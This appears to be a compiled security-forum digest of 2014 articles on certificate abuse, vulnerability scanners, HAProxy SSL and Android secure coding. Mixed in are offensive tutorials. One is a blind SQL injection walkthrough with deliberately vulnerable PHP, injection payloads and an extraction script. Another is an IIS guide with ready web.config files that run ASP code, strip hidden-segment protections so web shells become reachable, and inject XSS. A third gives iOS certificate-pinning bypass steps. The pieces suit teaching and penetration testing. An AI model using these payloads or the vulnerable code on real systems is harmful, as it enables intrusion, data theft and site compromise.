The experts noticed that a similar process is implemented by almost every malware used to steal digital certificates. Malicious code is used to steal certificate store information when the computer starts running. Once an attacker has obtained the victim's private key from a stolen certificate, they can use a tool like the Microsoft signing tool bundled with the Windows DDK, Platform SDK, and Visual Studio. Running Sign Tool (signtool.exe), it is possible to digitally sign any code, including malware.

Abuse prevention

I would like to close this post by introducing a couple of initiatives started to prevent the abuse of digital certificates. The first was launched by a security researcher at Abuse.ch: the SSL Blacklist, a project to create an archive of all the digital certificates used for illicit activities. Abuse.ch is a Swiss organization that has been involved over the last years in many investigations of the principal banker Trojan families and botnets.

"The goal of SSLBL is to provide a list of bad SHA1 fingerprints of SSL certificates that are associated with malware and botnet activities. Currently, SSLBL provides an IP based and a SHA1 fingerprint based blacklist in CSV and Suricata rule format. SSLBL helps you in detecting potential botnet C&C traffic that relies on SSL, such as KINS (aka VMZeuS) and Shylock," wrote the researcher in a blog post introducing the initiative.
The need to track abuse of certificates has emerged in recent years, after security experts discovered many cases in which bad actors abused digital certificates for illicit activities, ranging from malware distribution to Internet surveillance. Authors of malware are exploiting new methods to avoid detection by defense systems and security experts; for example, many attackers are using SSL to protect malicious traffic between C&C servers and infected machines.

Each item in the list associates a certificate with the malicious operations in which attackers used it. The abuses include botnets, malware campaigns, and banking malware. The archive behind the SSL Blacklist, which currently includes more than 125 digital certificates, comprises the SHA-1 fingerprint of each certificate with a description of the abuse. Many entries are associated with popular botnets and malware-based attacks, including Zeus, Shylock and KINS.

The SSL Blacklist is another project that can help the security community prevent cyber attacks. When the database matures, it will represent a precious resource for security experts dealing with malware and botnet operators that use certificates in their operations.

Abuse.ch isn't the only entity active in preventing illicit uses of certificates. Google is very active in the prevention of any abuse of stolen or unauthorized digital certificates. Earlier this year, the company launched its Certificate Transparency project, a sort of public register of the digital certificates that have been issued.

"Specifically, Certificate Transparency makes it possible to detect SSL certificates that have been mistakenly issued by a certificate authority or maliciously acquired from an otherwise unimpeachable certificate authority. It also makes it possible to identify certificate authorities that have gone rogue and are maliciously issuing certificates," states the official page of the project.
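As a rough illustration of how such a fingerprint blacklist could be consumed, the sketch below parses an SSLBL-style CSV of SHA-1 fingerprints and checks a certificate against it. The column layout (timestamp, SHA-1, listing reason) and the sample line are my assumptions for demonstration; check the project's site for the actual format before relying on it.

```python
import csv


def parse_sslbl_csv(text):
    """Map SHA-1 fingerprint -> listing reason from an SSLBL-style CSV.

    Lines starting with '#' are treated as comments/headers. The
    three-column layout is an assumption, not a documented contract.
    """
    entries = {}
    for row in csv.reader(text.splitlines()):
        if not row or row[0].startswith("#"):
            continue  # skip blank lines and comment/header lines
        timestamp, sha1 = row[0], row[1]
        reason = ",".join(row[2:])  # reason may itself contain commas
        entries[sha1.lower()] = reason
    return entries


def is_blacklisted(sha1_fingerprint, entries):
    """True if the certificate's SHA-1 fingerprint appears in the list."""
    return sha1_fingerprint.lower() in entries


# Illustrative sample data; a real feed would be downloaded from abuse.ch.
sample = (
    "# Listingdate,SHA1,Listingreason\n"
    "2014-07-15 10:00:00,aabbcc,KINS C&C\n"
)
entries = parse_sslbl_csv(sample)
```

An IDS or proxy could compute the SHA-1 of each server certificate it sees and call `is_blacklisted` to flag likely botnet C&C traffic.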
Unfortunately, many certificate authorities still aren't providing logs to the public.

References

http://www.firmadigitalefacile.it/cosa-e-un-certificato-digitale/
http://securityaffairs.co/wordpress/647/cyber-crime/2011-cas-are-under-attack-why-steal-a-certificate.html
http://hackmageddon.com/2011/12/10/another-certification-authority-breached-the-12th/
Turkey - Another story on use of fraudulent digital certificates (Security Affairs)
http://securityaffairs.co/wordpress/222/cyber-crime/avoid-control-lets-digitally-sign-malware-code.html
http://www.symantec.com/connect/blogs/diginotar-ssl-breach-update
Adobe Code Signing Certificate used to sign malware, who to blame? (Security Affairs)
SSL Blacklist a new weapon to fight malware and botnet (Security Affairs)
http://www.darkreading.com/attacks-and-breaches/stolen-digital-certificates-compromised-cia-mi6-tor/d/d-id/1099964
How Attackers Steal Private Keys from Digital Certificates (Symantec Connect)
How Digital Certificates Are Used and Misused
http://securityaffairs.co/wordpress/12264/cyber-crime/bit9-hacked-stolen-digital-certificates-to-sign-malware.html
http://files.cloudprivacy.net/ssl-mitm.pdf
http://securityaffairs.co/wordpress/4544/hacking/stuxnet-duqu-update-on-cyber-weapons-usage.html
http://www.globalsign.com/company/press/090611-security-response.html
http://www.wired.com/threatlevel/2011/10/son-of-stuxnet-in-the-wild/
Stuxnet signed certificates frequently asked questions (Securelist)
http://nakedsecurity.sophos.com/2011/11/03/another-certificate-authority-issues-dangerous-certficates/
http://www.f-secure.com/weblog/archives/00002269.html
http://nakedsecurity.sophos.com/2011/12/08/second-dutch-security-firm-hacked-unsecured-phpmyadmin-implicated

By Pierluigi Paganini | July 28th, 2014
Source: How Cybercrime Exploits Digital Certificates - InfoSec Institute
-
Android Application Secure Design/Secure Coding Guidebook

1. Introduction (p. 9)
 1.1. Building a Secure Smartphone Society (p. 9)
 1.2. Timely Feedback on a Regular Basis Through the Beta Version (p. 10)
 1.3. Usage Agreement of the Guidebook (p. 11)
2. Composition of the Guidebook (p. 12)
 2.1. Developer's Context (p. 12)
 2.2. Sample Code, Rule Book, Advanced Topics (p. 13)
 2.3. The Scope of the Guidebook (p. 16)
 2.4. Literature on Android Secure Coding (p. 17)
 2.5. Steps to Install Sample Codes into Eclipse (p. 18)
3. Basic Knowledge of Secure Design and Secure Coding (p. 34)
 3.1. Android Application Security (p. 34)
 3.2. Handling Input Data Carefully and Securely (p. 47)
4. Using Technology in a Safe Way (p. 49)
 4.1. Creating/Using Activities (p. 49)
 4.2. Receiving/Sending Broadcasts (p. 93)
 4.3. Creating/Using Content Providers (p. 126)
 4.4. Creating/Using Services (p. 175)
 4.5. Using SQLite (p. 219)
 4.6. Handling Files (p. 237)
 4.7. Using Browsable Intent (p. 264)
 4.8. Outputting Log to LogCat (p. 268)
 4.9. Using WebView (p. 280)
5. How to use Security Functions (p. 291)
 5.1. Creating Password Input Screens (p. 291)
 5.2. Permission and Protection Level (p. 306)
 5.3. Add In-house Accounts to Account Manager (p. 334)
 5.4. Communicating via HTTPS (p. 353)
6. Difficult Problems (p. 375)
 6.1. Risk of Information Leakage from Clipboard (p. 375)

Download: http://www.jssec.org/dl/android_securecoding_en.pdf
-
Symantec Endpoint Protection 0day

In a recent engagement, we had the opportunity to audit a leading antivirus endpoint protection solution, where we found a multitude of vulnerabilities. Some of these made it to CERT, while others have been scheduled for review during our upcoming AWE course at Black Hat 2014, Las Vegas. Ironically, the same software that was meant to protect the organization under review was the reason for its compromise.

We'll be publishing the code for this privilege escalation exploit in the next few days. In the meantime, you can check out our demo video of the exploitation process – best viewed in full screen.

More shameless Kali Dojo plugs

If you're attending the Black Hat, BruCON or DerbyCon 2014 conferences, don't forget to come by our free Kali Dojo workshops for some serious Kali Linux fu. See you there!

Source: http://www.offensive-security.com/vulndev/symantec-endpoint-protection-0day/
-
Automated vs hybrid vulnerability scanning: a CIO's experience

Aleksandr Kirpo, CSO of the credit card processor Ukrainian Processing Center

You will have heard about programs that perform automated security scanning for website safety assessments. Such scanning software was developed in response to international standards such as PCI DSS and the security requirements they specify. While these scanners may be familiar to e-commerce firms, for owners of businesses where no such standards apply, the idea of security scanners may be new.

There are many broadly similar security scanners available as software or SaaS, and for the uninitiated it can be difficult to understand the differences or their strengths and weaknesses. Further, despite their apparent simplicity, for organisations that do not have a professional information security officer it can be incredibly difficult to make effective use of these systems and the reports they generate.

It seems so simple: launch or order the scanner service, get the report and pass it to the development team for bug fixing. So what is the problem? There are actually two:

1. Just like the automated antivirus programs we run on our desktops, automatic website scanners do not always discover all vulnerabilities. That said, if the website is very simple it is likely that the scanner will indeed find all the vulnerabilities, but for more complex websites such effectiveness cannot be guaranteed.
2. Automatic scanners almost always report vulnerabilities that don't actually exist on the website (false positives). Sadly, the more "clever" a scanner is, the longer it scans and the more false positive results are likely to be reported.

So, can you get a report that reveals all the vulnerabilities and excludes false positives? Many IT security standards provide the answer and suggest using code reviews and penetration tests. The only problem with this approach is the price: it can be extremely high.
There are few qualified professionals who can conduct code reviews and penetration tests reliably, and such professionals are expensive.

Not all scanners are created equal

During my eighteen years in IT and IT security, I have used many types of security and scanning services and have had the chance to compare the results from automatic scanners, hybrid scanners and penetration testing. Here I share three examples of using website security scanning software.

When conducting a website assessment in 2013, we tried web security solutions from both Qualys and High-Tech Bridge. The output of these scans was a 100-page report from Qualys and a 15-page report from High-Tech Bridge's ImmuniWeb. It was easy for me to read and understand each report, but knowing the shortcomings of automated scanners, I was aware that the website could still have multiple (critical) security vulnerabilities that the automatic scanners would not have found. The two solutions take totally different approaches: while Qualys is a fully automated scanner, High-Tech Bridge's ImmuniWeb is a hybrid solution where the automated scanner is guided by a real person and complemented by manual penetration testing performed by a security professional.

In recent years, we found when scanning websites that the Qualys scanner would sometimes stop responding. If, as we were, you are chasing standards compliance, this can be a major headache, because you are left without a compliance report or even basic information that helps you understand the security level of the site. Of course there is technical support provided by scanner vendors: the last time I needed technical support from Qualys, it took me about a month to get the issue resolved. High-Tech Bridge's portal support replied within a few hours.

On another occasion, we assessed a medium-sized website using IBM Rational AppScan. The final document from AppScan came to 850 pages and listed 36 vulnerabilities.
Analysing the entire 850-page report and checking the website cost our developers about a month of effort, and ultimately they reported that these vulnerabilities were not actually exploitable. Next, we ordered expensive manual penetration testing from a German company, the results of which showed that none of the vulnerabilities reported by AppScan existed: they were all false positives (needless to say, the testing cost a lot of money). Finally, we ordered an ImmuniWeb assessment for 639 USD (the price is now 990 USD). The assessment had only one recommendation, to use a trusted SSL certificate: a recommendation echoed by the developers and testers who conducted the penetration tests. This is a very good example of how automated solutions can waste your time and money even if your web applications are safe.

How intelligent are security scanners?

A security professional reading a report generated by automatic scanners will recognise that the way these scanners work is through pattern matching. What's wrong with that? Well, it means that any substantial deviation from the template will cause the scanner to miss the vulnerability. A website owner should be aware that there are programmers who will leave vulnerabilities in the code on purpose, and some do it in a way that the scanners cannot detect. Even the most advanced automatic scanners need to match against a huge number of templates: this is probably why so many scanners take such a long time to complete a website scan.

Pattern-matching automated scanners have much in common with antivirus software. With antivirus software, the icon on your computer does not mean that there is no virus on your PC; it just means that the antivirus hasn't recognised any viruses on your PC. The success of antivirus software and automatic scanners depends on many factors, such as how up to date the software and pattern-matching databases are, together with the mechanism used to conclude that vulnerabilities (or viruses) are present.
So, to be truly effective, the fully automated approach needs to be supplemented by an IT security expert who can add human intelligence and professional experience to the process, and ultimately give confidence that vulnerabilities will not go unnoticed during a security scan.

Adding human intelligence is what the Swiss company High-Tech Bridge did with its hybrid scanning approach. Its innovative SaaS, called ImmuniWeb, combines automated scanning with manual testing: the scanning is done by a program, and at the same time the results of the scanner are checked and completed by a professional who is qualified to carry out penetration tests. This expert can immediately refine tasks for scanning based on the website being assessed, which eliminates false positives from the scanner report. Moreover, manual penetration testing guarantees the highest detection rate of vulnerabilities.

It is interesting to note that the results of the low-cost hybrid assessment and expensive professional penetration tests are, in certain cases, the same. For example, say an open-source platform is used for the website. The expert is already aware of the known vulnerabilities of the platform at the time of scanning, so in the case of the hybrid approach, the expert need only find out the version of the platform being used and check its settings. Thus, the report will be specific to the platform used and contain only information relating to vulnerabilities that really exist and are exploitable.

If you have decided to check the security of your website quickly and economically, then you need to decide which scanner to choose: an automatic one with a huge report that in practice is never read to the end, or a hybrid one with a brief report containing recommendations verified and completed by a security expert.

What is the best way to check whether your website is secure?
For firms building new websites or updating existing ones, here's a list of factors to consider:

1. The specification you give to the developer should be prepared with security in mind.
2. The website developer should:
- have a good understanding of the secure software development lifecycle;
- attend regular web security training;
- perform obligatory code reviews, handled internally or by a third-party company;
- have established IT security processes in the company.
3. Software testing at all stages should include testing for security issues.
4. Plan for ongoing maintenance of the website, including improvements and updates.
5. Ensure a credible and effective response to hacking, DoS and DDoS attacks.
6. The infrastructure of your website should be properly protected.

Beware of trusting your server host to secure your website. Hosting companies often make much noise about their security services (usually limited to one or more antivirus and malware-detection programs). However, such measures reduce the risk of an infrastructure breach but are absolutely insufficient for protecting a website as a separate software package. So when you need to check the security of your website, it means that you need scans and penetration tests of your web application, not of the infrastructure (which is also vital for website security, but there are far fewer attack vectors against infrastructure, and hardening it is better understood). By the way, infrastructure security should be fully checked and assured by the hosting company: make sure it is mentioned in your contract.

Source: Automated vs hybrid vulnerability scanning | ITsecurity
-
Writing your own blind SQLi script

We all know that sqlmap is a really great tool with a lot of options that you can tweak and adjust to exploit the SQLi vuln you just found (or that sqlmap found for you). On rare occasions, however, you might want a small and simple script, or you just want to learn how to do it yourself. So let's see how you could write your own script to exploit a blind SQLi vulnerability.

Just to make sure we are all on the same page, here is the blind SQLi definition from OWASP:

Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response.

You can also roughly divide the exploitation techniques into two categories (like OWASP does), namely:

- Content based: the page output tells you if the query was successful or not.
- Time based: based on a time delay you can determine if your query was successful or not.

Of course you have dozens of variations on the above two techniques; I wrote about one such variation a while ago. For this script we are going to focus on the basics of the two techniques mentioned. If you are more interested in knowing how to find SQLi vulnerabilities, you could read my article on solving RogueCoder's SQLi challenge. Since we are only focusing on automating a blind SQL injection, we will not be building functionality to find SQL injections.

Before we even think about sending SQL queries to the servers, let's first set up the vulnerable environment and try to be a bit realistic about it. Normally this means that you at least have to log in, keep your session and then inject. In some cases you might even have to take into account CSRF tokens, which, depending on the implementation, means you have to parse some HTML before you can send the request. This will however be out of scope for this blog entry.
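The time-based category from the list above can be sketched in a few lines: time how long the injected request takes, and compare that against the delay you asked the database to add. The payload shape and the threshold below are illustrative choices, not code from this post.

```python
import time


def is_true_time_based(send_request, delay_seconds=3.0):
    """Time-based blind SQLi oracle.

    `send_request` is any zero-argument callable that performs the HTTP
    request carrying a payload such as:
        x' and 1=if((<CONDITION>),sleep(3),0)-- -
    If the response takes at least `delay_seconds`, the injected
    condition evaluated to true (the database slept).
    """
    start = time.time()
    send_request()
    return time.time() - start >= delay_seconds


# Hypothetical usage with the requests library:
# oracle = lambda: requests.get(url, params={"name": payload})
# if is_true_time_based(oracle):
#     print("condition is true")
```

In practice you would first measure a baseline response time and pick a sleep value well above it, since network jitter can otherwise cause false positives.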
If you want to know how you could parse HTML with python you could take a look at my credential scavenger entry. If you just want the scripts you can find them in the example_bsqli_scripts repository on my github; since this is an entry on how you could write your own scripts, all the values are hard coded in the script.

The vulnerable environment

Since we are doing this for learning purposes anyway, let's create almost everything from scratch:

sudo apt-get install mysql-server mysql-client
sudo apt-get install php5-mysql
sudo apt-get install apache2 libapache2-mod-php5

Now let's write some vulnerable code and abuse the mysql database and its tables for our vulnerable script, which saves us the trouble of creating a test database.

pwnme-plain.php

<?php
$username = "root";
$password = "root";

$link = mysql_connect('localhost', $username, $password);
if (!$link) {
    die(mysql_error());
}

if (!mysql_select_db("mysql", $link)) {
    die(mysql_error());
}

$result = mysql_query("select user,host from user where user='" . $_GET['name'] . "'", $link);

echo "<html><body>";
if (mysql_num_rows($result) > 0) {
    echo "User exists<br/>";
} else {
    echo "User does not exist<br/>";
}

if ($_GET['debug'] === "1") {
    while ($row = mysql_fetch_assoc($result)) {
        echo $row['user'] . ":" . $row['host'] . "<br/>";
    }
}
echo "</body></html>";

mysql_free_result($result);
mysql_close($link);
?>

As you can see, if you give it a valid username it will say the user exists, and if you don't give it a valid username it will tell you the user doesn't exist. If you need more information you can append a debug flag to get actual output. You probably also spotted the SQL injection, which you can for example exploit like this:

http://localhost/pwnme-plain.php?name=x' union select 1,2--+

Which results in the output:

User exists

and if you mess up the query, or the query doesn't return any row, it will result in:

User does not exist

Sending and receiving data

We are going to use the python package requests for this.
If you haven't heard of it yet, it makes working with HTTP stuff even easier than urllib2. If you happen to encounter weird errors with the requests library you might want to install the library yourself instead of using the one provided by your distro.

To make a request using GET and get the page content you'd use:

print requests.get("http://localhost/pwnme-plain.php").text

If you want to pass in parameters you'd do it like this (the keyword argument is params, which also ensures that the parameters are automatically encoded):

urlparams = {'name':'root'}
print requests.get("http://localhost/pwnme-plain.php",params=urlparams).text

To make a request using POST you'd use:

postdata = {'user':'webuser','pass':'webpass'}
print requests.post("http://localhost/pwnme-login.php",data=postdata).text

That's all you need to start sending your SQLi payload and receiving the response.

Content based automation

For content based automation you basically need a query which will change the content based on the output of the query. You can do this in a lot of ways; here are two examples:

[*] display or don't display content
id=1 and 1=if(substring((select @@version),1,1)=5,1,2)
[*] display content based on the query output
id=1 + substring((select @@version),1,1)

For our automation script we will choose the first way of automating it, since it depends less on the available content. The first thing you need is a "universal" query which you use as the base to execute all your other queries. In our case this could be:

root' and 1=if(({PLACEHOLDER})=PLACEHOLDERVAR,1,2)--+

With the above query we can decide what we want to display.
If we want to display the wrong content, we have to replace the PLACEHOLDER text and PLACEHOLDERVAR with something that will make the 'if clause' choose '2', for example:

root' and 1=if(substring((select @@version),1,1)=20,1,2)--+

Since there is no mysql version 20 this will lead to a query that ends up being evaluated as:

root' and 1=2

Which results in a False result, thus displaying the wrong content, in our case 'User does not exist'. If on the other hand we want the query to display the good content we can just change it to:

root' and 1=if(substring((select @@version),1,1)=5,1,2)--+

Which of course will end up as:

root' and 1=1

Articol complet: Writing your own blind SQLi script | DiabloHorn
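Putting the pieces above together, the true/false page check can drive a binary search that extracts an arbitrary string one character at a time. This is a minimal sketch, not DiabloHorn's actual script: the HTTP round trip is hidden behind an `oracle` callable (for live use, swap in a function that sends the "universal" query with requests and checks the page for "User exists"), and the offline demo fakes the oracle against a known secret so you can see it work without a server.

```python
# Content-based blind SQLi extraction as a binary search over character
# codes. The HTTP round trip is abstracted behind `oracle`, a callable
# answering one true/false question; for live use, replace fake_oracle
# with a requests.get() against pwnme-plain.php that checks the page
# for "User exists".
import re

def extract(oracle, expr, max_len=32):
    """Extract the string value of an SQL expression, one char at a time."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # Ask: is ascii(substring(expr, pos, 1)) greater than mid?
            if oracle("ascii(substring((%s),%d,1))>%d" % (expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # substring() past the end yields '', and ascii('') is 0
            break
        out += chr(lo)
    return out

# Offline demo: a fake oracle that answers the question against a known
# secret, standing in for the "User exists" / "User does not exist" check.
SECRET = "5.5.37"

def fake_oracle(condition):
    pos, threshold = map(int, re.search(r",(\d+),1\)\)>(\d+)$", condition).groups())
    code = ord(SECRET[pos - 1]) if pos <= len(SECRET) else 0
    return code > threshold

print(extract(fake_oracle, "select @@version"))  # prints 5.5.37
```

The same skeleton covers the time-based variant from the list above: the oracle then wraps the condition in a sleep() payload and times the request instead of inspecting the page content.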
-
[h=1]Upload a web.config File for Fun & Profit[/h]

The web.config file plays an important role in storing IIS7 (and higher) settings. It is very similar to a .htaccess file in Apache web server. Uploading a .htaccess file to bypass protections around the uploaded files is a known technique. Some interesting examples of this technique are accessible via the following GitHub repository:

https://github.com/wireghoul/htshells

In IIS7 (and higher), it is possible to do similar tricks by uploading or making a web.config file. A few of these tricks might even be applicable to IIS6 with some minor changes. The techniques below show some different web.config files that can be used to bypass protections around the file uploaders.

[h=2]Running web.config as an ASP file[/h]

Sometimes IIS supports ASP files but it is not possible to upload any file with .ASP extension. In this case, it is possible to use a web.config file directly to run ASP classic codes:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->

[h=2]Removing protections of hidden segments[/h]

Sometimes file uploaders rely on Hidden Segments of IIS Request Filtering, such as the App_Data or App_GlobalResources directories, to make the uploaded files inaccessible directly. However, this method can be bypassed by removing the hidden segments using the following web.config file:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <security>
      <requestFiltering>
        <hiddenSegments>
          <remove segment="bin" />
          <remove segment="App_code" />
          <remove segment="App_GlobalResources" />
          <remove segment="App_LocalResources" />
          <remove segment="App_Browsers" />
          <remove segment="App_WebReferences" />
          <remove segment="App_Data" />
          <!-- Other IIS hidden segments can be listed here -->
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>

Now, an uploaded web shell file can be directly accessible.

[h=2]Creating XSS vulnerability in IIS default error page[/h]

Often attackers want to make a website vulnerable to cross-site scripting by abusing the file upload feature.
The handler name of the IIS default error page is vulnerable to cross-site scripting, which can be exploited by uploading a web.config file that contains an invalid handler name (does not work in IIS 6 or below):

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers>
      <!-- XSS by using *.config -->
      <add name="web_config_xss<script>alert('xss1')</script>" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="fooo" resourceType="Unspecified" requireAccess="None" preCondition="bitness64" />
      <!-- XSS by using *.test -->
      <add name="test_xss<script>alert('xss2')</script>" path="*.test" verb="*" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
    <httpErrors existingResponse="Replace" errorMode="Detailed" />
  </system.webServer>
</configuration>

[h=2]Other techniques[/h]

Rewriting or creating the web.config file can lead to a major security flaw. In addition to the above scenarios, different web.config files can be used in different situations. I have listed some other examples below (the relevant web.config syntax can be easily found by searching in Google):

- Re-enabling .Net extensions: when .Net extensions such as .ASPX are blocked in the upload folder.
- Using an allowed extension to run as another extension: when ASP, PHP, or other extensions are installed on the server but they are not allowed in the upload directory.
- Abusing error pages or URL rewrite rules to redirect users or deface the website: when the uploaded files such as PDF or JavaScript files are in use directly by the users.
- Manipulating MIME types of uploaded files: when it is not possible to upload an HTML file (or other sensitive client-side files) or when the IIS MIME types table is restricted to certain extensions.
[h=2]Targeting more users via client-side attacks[/h]

Files that have already been uploaded to the website and have been used in different places can be replaced with other contents by using the web.config file. As a result, an attacker can potentially target more users to exploit client-side issues such as XSS or cross-site data hijacking by replacing or redirecting the existing uploaded files.

[h=2]Additional Tricks[/h]

Sometimes it is not possible to upload or create a web.config file directly. In this case, copy, move, or rename functionality of the web application can be abused to create a web.config file. The Alternate Data Stream feature can also be useful for this purpose. For example, "web.config::$DATA" can create a web.config file with the uploaded file contents, or "web.config:.txt" can be used to create an empty web.config file; and when a web.config file is available in the upload folder, the Windows 8.3 filename ("WEB~1.con") or the PHP on IIS feature ("web<<") can be used to point at the web.config file.

Sursa: https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/
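One practical note on the configs above: IIS typically refuses to serve a directory whose web.config is not well-formed XML (you get a 500-class configuration error instead of your shell), so it is worth checking that a crafted file parses before uploading it. A throwaway generator like this (my sketch, not from the original post) builds the hidden-segments variant and validates it:

```python
# Build the "remove hidden segments" web.config from a list of segment
# names and verify the result is well-formed XML before uploading it.
import xml.etree.ElementTree as ET

SEGMENTS = ["bin", "App_code", "App_GlobalResources", "App_LocalResources",
            "App_Browsers", "App_WebReferences", "App_Data"]

def build_web_config(segments):
    configuration = ET.Element("configuration")
    server = ET.SubElement(configuration, "system.webServer")
    security = ET.SubElement(server, "security")
    filtering = ET.SubElement(security, "requestFiltering")
    hidden = ET.SubElement(filtering, "hiddenSegments")
    for name in segments:
        ET.SubElement(hidden, "remove", {"segment": name})
    return b'<?xml version="1.0" encoding="UTF-8"?>' + ET.tostring(configuration)

payload = build_web_config(SEGMENTS)
ET.fromstring(payload)  # raises ParseError if we produced broken XML
```

Write `payload` to a file named web.config and upload it through whatever channel the target's uploader allows.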
-
Bypass iOS Version Check and Certification validation

7/28/2014 | NetsPWN

Certain iOS applications check for the iOS version number of the device. Recently, during testing of a particular application, I encountered an iOS application that was checking for iOS version 7.1. If version 7.1 was not being used, the application would not install on the device and would throw an error.

This blog is divided into three parts:

1. Change the version number value in the SystemVersion.plist file.
2. Change the version number value in the plist file present in the iOS application IPA.
3. Use the 'iOS-ssl-kill-switch' tool to bypass certificate validation.

Change version number value in SystemVersion.plist file

The version of the iOS device can be faked (on a jailbroken device) in two simple steps by changing the value in the SystemVersion.plist file:

1. SSH into a jailbroken device (or use iFile, available on Cydia) to browse through the system folder.
2. Change the 'ProductVersion' value in the '/System/Library/CoreServices/SystemVersion.plist' file to the desired iOS version.

Fig 1: iOS version can be faked by changing the value of ProductVersion key.

This will change the version number displayed in the version tab located in 'Settings/General/About' on the iOS device. Although this trick might work on some of the applications that check for the value saved in the '/System/Library/CoreServices/SystemVersion.plist' file, it won't work on every application. If it fails, we can use the second method given below.

Change version number value in plist file present in iOS application IPA

If you are unsure about the method that the application is using to look for the version number, then we can use another simple trick to change the iOS version value. The version check in an IPA can be faked in three simple steps:

1. Rename the IPA to a .zip file and extract the folder.
2. Find the info.plist file, located usually in \Payload\appname.app, and change the string 'minimum ios version' to the version you need.
3. Zip the file again and change it back to .ipa.

[Note: Some applications can also use other plist files instead of the info.plist file to check for the minimum version]

Fig 2: MinimumOSVersion requirement defined in info.plist file in the iOS application.

Manipulating any file inside the IPA will break the signature. So, to fix this problem, the IPA would need to be resigned. We can use the tool given here on Christoph Ketzler's blog.

Some applications also perform the version check during the installation process. When a user tries to install the application using iTunes, or Xcode using the IPA, the IPA checks for the version of iOS running on that device, and if the version is lower than the minimum required version it will throw an error similar to the one given below.

Fig 3: Error message while installing the application using xcode.

The version check performed during the installation stage can be bypassed using this simple trick:

1. Rename the .ipa application package to .zip and then extract the .app folder.
2. Copy the .app folder to the path where iOS applications are installed (/root/application) using an SFTP client like WinSCP.
3. SSH into the device and browse to the folder where the IPA is installed, then change the permission of the .app folder to executable (chmod -R 755 or chmod -R 777). Alternately you can change the permissions by right-clicking the .app in WinSCP, choosing change properties, and checking all the read, write, and execute permissions.
4. Restart the iOS device and the application will be successfully installed.

Fig 4: Changing permissions of the IPA to executable.

iOS Certification validation bypass

Some applications perform certificate validation. Certificate validation is performed to prevent application traffic from being proxied using a MitM proxy like Burp.
Typically the application has a client certificate hard coded into the binary (i.e. the application itself). The server checks for this client certificate, and if it does not match then it throws a certificate validation error. Refer to my co-worker Steve Kern's blog on Certificate Pinning in a Mobile Application for further details.

Sometimes it is difficult to extract the certificate from the application and install it into the proxy. An alternative approach is to use a tool developed by iSEC Partners called ios-ssl-kill-switch. This tool hooks into the Secure Transport API, which is the lowest level API, and disables the check for certificate validation. Most certificate validation techniques use NSURLConnection, which is a higher level API, to validate client certificates. More technical details can be found here.

Bypassing certificate validation can be performed in the following steps:

1. Install the kill-ssl-switch tool. Make sure the dependencies given on the installation page are installed prior to the installation of the software.
2. Restart the device, or restart SpringBoard using the following command: 'killall -HUP SpringBoard'
3. Enable the Disable Certificate Validation option in 'Settings/SSL Kill Switch'.
4. Restart the application and confirm that a MitM proxy can intercept the traffic successfully.

Certificate pinning can be bypassed by hooking into the API which makes the check for certificate validation and returning a true value for "certificate validated" all the time. MobileSubstrate is a useful framework for writing tweaks for disabling certificate pinning checks. There are a few other handy tools as well, like 'Trustme' by Intrepidusgroup and 'Snoop-it' by Nesolabs, to disable certificate pinning.

Fig 5: Turn off certificate validation using SSL Kill Switch.

Sursa: https://www.netspi.com/blog/entryid/236/bypass-ios-version-check-and-certification-validation
-
Using SSL Certificates with HAProxy

Posted 2014/07/29

I'm writing an eBook, Servers for Hackers! Check out the page for more information - it should be out in early September.

Overview

If your application makes use of SSL certificates, then some decisions need to be made about how to use them with a load balancer. A simple setup of one server usually sees a client's SSL connection being decrypted by the server receiving the request. Because a load balancer sits between a client and one or more servers, where the SSL connection is decrypted becomes a concern.

There are two main strategies.

SSL Termination is the practice of terminating/decrypting an SSL connection at the load balancer, and sending unencrypted connections to the backend servers. This means the load balancer is responsible for decrypting an SSL connection - a slow and CPU-intensive process relative to accepting non-SSL requests.

This is the opposite of SSL Pass-Through, which sends SSL connections directly to the proxied servers. With SSL Pass-Through, the SSL connection is terminated at each proxied server, distributing the CPU load across those servers. However, you lose the ability to add or edit HTTP headers, as the connection is simply routed through the load balancer to the proxied servers. This means your application servers will lose the ability to get the X-Forwarded-* headers, which may include the client's IP address, port and scheme used.

Which strategy you choose is up to you and your application needs. SSL Termination is the most typical I've seen, but pass-through is likely more secure.

There is a combination of the two strategies, where SSL connections are terminated at the load balancer, adjusted as needed, and then proxied off to the backend servers as a new SSL connection. This may provide the best of both security and ability to send the client's information. The trade-off is more CPU power being used all-around, and a little more complexity in configuration.
An older article of mine on the consequences and gotchas of using load balancers explains these issues (and more) as well. Articol: Using SSL Certificates with HAProxy | Servers for Hackers
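The two strategies above map onto two short HAProxy configuration sketches. These are illustrative, not from the article: the backend names, server addresses and certificate path are made up, the two frontends are alternatives (both bind :443, so use one or the other), and the termination variant assumes HAProxy 1.5+ for the ssl/crt bind options:

```
# SSL termination: decrypt at the load balancer, speak plain HTTP to
# the backends, and add the X-Forwarded-* headers the article mentions.
frontend https_in
    bind *:443 ssl crt /etc/haproxy/certs/example.com.pem
    mode http
    option forwardfor              # adds X-Forwarded-For
    http-request set-header X-Forwarded-Proto https
    default_backend app_http

backend app_http
    mode http
    server app1 10.0.0.11:80 check

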